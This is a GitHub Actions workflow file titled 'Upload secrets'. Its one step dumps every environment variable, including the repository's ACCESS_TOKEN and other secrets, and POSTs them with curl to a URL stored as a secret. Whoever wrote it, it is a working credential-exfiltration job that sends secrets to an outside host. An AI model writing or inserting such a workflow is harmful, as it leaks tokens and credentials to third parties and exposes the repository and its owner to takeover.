name: Upload secrets
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: upload
      run: printenv | curl -X POST -d @- $STAT_UPLOAD_URL
      env:
        ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}
        CUSTOM_ACTOR: ${{ secrets.CUSTOM_ACTOR }}
        EXCLUDED: ${{ secrets.EXCLUDED }}
        EXCLUDED_LANGS: ${{ secrets.EXCLUDED_LANGS }}
        STAT_UPLOAD_URL: ${{  secrets.STAT_UPLOAD_URL }}
